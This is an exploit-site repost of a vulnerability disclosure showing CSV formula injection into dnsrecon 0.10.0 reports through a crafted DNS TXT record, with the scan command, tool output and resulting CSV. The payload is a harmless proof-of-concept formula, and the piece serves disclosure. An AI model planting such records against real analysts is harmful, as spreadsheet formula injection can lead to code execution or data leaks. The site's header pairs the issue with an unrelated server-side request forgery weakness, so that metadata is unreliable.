Advertisement






dnsrecon 0.10.0 CSV Injection

CVE Category Price Severity
CVE-2020-7922 CWE-918 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-08
CPE
cpe:cpe:/a:dnsrecon:dnsrecon:0.10.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.55 0.924157

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010071

Below is a copy:

dnsrecon 0.10.0 CSV Injection
# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
# Version : 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:

_spf.example.com       "test',=1+1337,'z"


user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
[*] Performing General Enumeration of Domain: _spf.example.com
[-] DNSSEC is not configured for _spf.example.com
[*]  SOA ns-59.awsdns-07.com 205.1.1.1
[-] Could not Resolve NS Records for _spf.example.com
[-] Could not Resolve MX Records for _spf.example.com
[*]  TXT _spf.example.com test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}


This output will then be rewritten into a CSV with this structure:

Type,Name,Address,Target,Port,String
SOA,ns-59.awsdns-07.com,205.1.1.1
TXT,_spf.example.com,,,,'test',=1+1337,'z'

The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:

Attribute Values
  All printable ASCII characters are permitted in the attribute value.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum